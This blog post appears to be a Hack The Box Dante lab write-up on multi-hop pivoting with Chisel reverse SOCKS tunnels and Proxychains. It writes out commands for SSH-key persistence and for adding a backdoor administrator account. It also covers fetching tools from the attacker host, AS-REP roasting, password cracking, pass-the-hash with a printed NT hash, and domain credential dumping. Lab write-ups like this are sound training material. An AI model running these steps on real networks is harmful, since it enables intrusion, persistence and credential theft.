Chisel with Proxychains

Network Attack Post-Exploitation Tools Windows Attack

Chisel is a fast TCP/UDP tunnel, transported over HTTP, and secured via SSH. It uses a single executable for establishing connections as the client or server. Chisel is written in Go (golang). It is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into any network.

Proxychains is a UNIX program, that hooks network-related libc functions in dynamically linked programs via a preloaded DLL (dlsym(), LD_PRELOAD) and redirects the connections through SOCKS4a/5 or HTTP proxies. It supports TCP only (no UDP/ICMP etc).

Recently I’ve completed the Hack The Box Dante Pro Labs and really enjoyed it. One of the most crucial pieces to being successful in the lab is understanding how to pivot properly. So I wanted to write up a blog post explaining how to properly pivot.

Chisel is an amazing tool and the gracious creators have created releases for every major version that can be downloaded and used immediately. The tool can also be installed using these following commands:

## Install Go
└─$ sudo apt-get install golang 

### Setup Chisel locally on attacker machine
└─$ sudo git clone /opt/chisel
└─$ cd /opt/chisel

### Create Windows 64-bit architecture executable file
└─$ sudo GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" .

### Create Windows 32-bit architecture executable file
└─$ sudo GOOS=windows GOARCH=386 go build -ldflags="-s -w" .

# MacOS 64-bit
GOOS=darwin GOARCH=amd64 go build -ldflags="-s -w" .

# MacOS 32-bit
GOOS=darwin GOARCH=386 go build -ldflags="-s -w" .

# Linux 64-bit
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" .

# Linux 32-bit
GOOS=linux GOARCH=386 go build -ldflags="-s -w" .


Here is a network diagram to help visualize what the Attacker’s movements will be as they pivot between the networks to reach every machine.

Dante Network Diagram

We are the Attacker and have found a Web Server that is open on the internet. Our Attacker machine is and the Web Server that is internet facing at could be the starting point used to get onto the Admin Network.

We have gained a foothold through a vulnerability found on the Web Server. We then escalate to gain root/admin on the web server. The Web Server happens to be installed on a Linux machine and we have appended our Attacker machine’s SSH keys  to achieve persistence.

# pwd

# ls -lah
ls -lah
total 24K
drwx------ 2 root root 4.0K Aug 15  2018 .
drwx------ 6 root root 4.0K Sep 23 17:49 ..
-rw------- 1 root root  393 Apr 20  2018 authorized_keys
-rw------- 1 root root 1.7K Apr 20  2018 id_rsa
-rw-r--r-- 1 root root  393 Apr 20  2018
-rw-r--r-- 1 root root  222 Aug 15  2018 known_hosts

<<--  Added to ~/.ssh/authorized_keys
# cat your_key >> ~/.ssh/authorized_keys

# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EKxkeF6t9Uo8zwn+O/p root@syslog
ssh-rsa AAAAB3NzaC1AWFWAf6bX6HCKxscFG1qc= kali@kali

Now we begin recon on the internal network. There are a ton of ways to go about doing this. The easiest way is to transfer a tool such as nMap directly onto the Web Server machine and scan the internal network. Another way is to use a dynamic SSH tunnel utilizing SOCKS4 and use nMap with Proxychains to yield results, but this is slow. If you have access to Cobalt Strike then you can also use a beacon to setup proxy to pivot through that too. But the main focus of this post is to understand how to properly pivot without those other methods and use Chisel instead.

First we need to start a Chisel server running on port 8001 on our attacker machine so we can pivot through the [external/internal IP address] machine and gain access to the Office Network. Run the following command to start a server:

### Open local attacker machine 

└─$ sudo ./chisel_1.7.7_linux_amd64 server -p 8001 --reverse
[sudo] password for kali: 
2022/09/04 15:12:34 server: Reverse tunnelling enabled
2022/09/04 15:12:34 server: Fingerprint 3SwItiHt3ZYqnmnGzIo17qlM/cO+02ZPHoJddb21ACk=
2022/09/04 15:12:34 server: Listening on

#### <<<----------- This comes after the Web Server connects
#### <<<----------- to the local attacker machine
2022/09/04 15:17:42 server: session#4: tun: proxy#R:>socks: Listening

Using the foothold on the Web Server, we transfer Chisel to the machine and connect back to our Chisel server to complete the tunnel.

# Transfer Chisel, moving chisel over first
└─$ scp chisel_1.7.7_linux_amd64 root@

# Then connect Web Server to Attacker with Chisel 
└─$ ssh root@
root@NIX01:~# ./chisel_1.7.7_linux_amd64 client R:1080:socks

Now the Proxychains settings need to be updated on the Attacker machine to utilize this new network access using Chisel.

# Update proxychains config using your favorite text editor
└─$ sudo vi /etc/proxychains4.conf

# Add this following line at the bottom
socks5   1080

Office Network

Congrats! We now have access to the internal Office Network After repeating several more phases of recon, exploitation, and privilege escalation, we have found a machine that has access to the Admin Network. The Office Domain Controller in the network has access to a machine on the Admin Network We will now use Chisel to build a tunnel between the Web Server and the Domain Controller.

### Open Web Server machine 
└─$ ssh root@     
root@DANTE-WEB-NIX01:~# ./chisel_1.7.7_linux_amd64 server -p 8002 --reverse
2022/09/04 12:23:56 server: Reverse tunnelling enabled
2022/09/04 12:23:56 server: Fingerprint sVLqwWRIhrXeM1h6RYkiUJ10JmZCfzSO1Uo41FHVfs0=
2022/09/04 12:23:56 server: Listening on
2022/09/04 12:50:04 server: session#1: Client version (0.0.0-src) differs from server version (1.7.7)

### <<<------------ This comes after the office Domain Controller  
### <<<------------ connects to the Web Server.
2022/09/04 12:50:04 server: session#1: tun: proxy#R:>socks: Listening

We use the Office Domain Controller to create a new user, haxor, in the Admin group with Remote Desktop access.

### Connect the Office Domain Controller to the Web Server
###   <---- internal for the Office Domain Controller
###  <---- internal for the Web Server
### Create a new user and give them Admin control  
### Using PowerShell or CMD Prompt

net user haxor Pa$$W0rd /add
net localgroup "remote desktop users" /add "domain\haxor"
net localgroup Administrators domain\haxor /add

We could also use a tool like Meterpreter to download the Chisel file onto the Office Domain Controller or download it from within a PowerShell session off our Attacker Machine.

### Back on local Attacker Machine
### Build a temporary Web Server to host the Chisel file
└─$ sudo python3 -m http.server 443

### Within PowerShell on the Office Domain Controller machine
Invoke-WebRequest -URI -OutFile chisel.exe

We can now SSH to the Office Domain Controller and start the new Chisel tunnel from there to the Web Server

### SSH to Web Server target
└─$ proxychains ssh haxor@   
chisel.exe client R:2080:socks

We update the Proxychains settings on the local Attacker machine to utilize the new tunnel.

### Update the Proxychains config
$ sudo nano /etc/proxycahins4.conf

# Add the new line for 2080
socks5   1080
socks5   2080

Admin Network

The Attacker machine can now reach the Admin Domain Controller in the Admin Network We must elevate to root/admin to reach and enumerate the other machines on the Admin Network.

We try asreproating against all known users from a leaked file with Impacket’s or using kerbrute.

proxychains dante.admin/ -no-pass -usersfile /root/ctf/htb/dante/ -dc-ip

We now have a hash for the jbercov user in the dante.admin domain for the Admin Network.

Crack the hashed password using john with rockyou.txt and we have the password of myspace7

The new credentials can be used for authentication with the winrm service through the crackmapexec or evil-winrm tool.

└─$ proxychains python3 crackmapexec winrm -u jbercov -p 'myspace7'

└─$ crackmapexec winrm -u jbercov -p 'myspace7' 
SMB       5985   NONE             [*] None (name: (domain:None)
HTTP       5985   NONE             [*]
WINRM       5985   NONE             [+] None\jbercov:myspace7 (Pwn3d!)
WINRM       5985   NONE             [-] None\jbercov:myspace7 "'NoneType' object has no attribute 'upper'"

└─$ evil-winrm -i -u jbercov -p myspace7

We can now grab the hash for the Administrator account.

└─$ sudo proxychains ./ dante.admin/jbercov:'myspace7'@ -dc-ip    
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[proxychains] Dynamic chain  ...  ...  ...  ...  OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Dynamic chain  ...  ...  ...  ...  OK
[proxychains] Dynamic chain  ...  ...  ...  ...  OK
[*] Kerberos keys grabbed
[*] Cleaning up... 

We pass this hash to start a PowerShell session with the Admin Domain Controller.

└─$ proxychains evil-winrm -i -u administrator -H 4c827b7074e99eefd49d05872185f7f8

*Evil-WinRM* PS C:\Users\Administrator\Documents> upload chisel_1.7.7_windows_amd64

We go back to the Office Domain Controller with its respective admin account, haxor, that weas created earlier. We use Chisel to begin building the new tunnel.

### Open Office Domain Controller machine 
└─$ proxychainsssh haxor@   
 chisel.exe -p 8003 --reverse
2022/09/04 12:23:56 server: Reverse tunnelling enabled
2022/09/04 12:23:56 server: Fingerprint sVLqwWRIhrXeM1h6RYkiUJ10JmZCfzSO1Uo41FHVfs0=
2022/09/04 12:23:56 server: Listening on
2022/09/04 12:50:04 server: session#1: Client version (0.0.0-src) differs from server version (1.7.7)

<<<------------ This comes after the Domain Controller connects to the Web Server
2022/09/04 12:50:04 server: session#1: tun: proxy#R:>socks: Listening

We will now SSH to the Admin Domain Controller passing the hash for the administrator account. We will then move Chisel onto the machine and connect the tunnel from the Admin Domain Controller to the Office Domain Controller.

### Build a tunnel between the Domain Controllers
###  <---- Office Domain Controller
###   <---- Admin Domain Controller
└─$ proxychains evil-winrm -i -u administrator -H 4c827b7074e99eefd49d05872185f7f8

###  using evil-winrm uploaded chisel file
*Evil-WinRM* PS C:\Users\Administrator\Documents> upload chisel_1.7.7_windows_amd64

### note this needed to be ran in PowerShell
*Evil-WinRM* PS C:\Users\Administrator\Documents> Start-Process -NoNewWindow -FilePath "chisel.exe" -ArgumentList “client R:3080:socks”

We need to update the Proxychains configuration on the local Attacker machine for the third and last tunnel.

### Update Proxychains config
sudo nano /etc/proxycahins4.conf

### Add the third new tunnel path
socks5   1080
socks5   2080
socks5   3080

Now the Attacker can hit the final targets on the Admin Network

The Attacker starts on their local machine from We open port 8001 to use for the first tunnel routing to port 1080 for the Web Server with a respective internal/external IP address of The Web Server is on the Office Network

We pivot through the Web Server to reach the Office Domain Controller on the Office Network We build a second tunnel from port 8002 of the Web Server to port 2080 of the Office Domain Controller.

The Domain Controller is able to reach the Admin Domain Controller on the Admin Network To reach the final targets on the Admin Network, we need to build the last tunnel from port 8003 of the Office Domain Controller to port 3080 of the Admin Domain Controller.

The malicious user can use all tools locally on the Attacker machine against any target in the Admin or Office Network.

proxychains nmap

Leave a Reply

Your email address will not be published. Required fields are marked *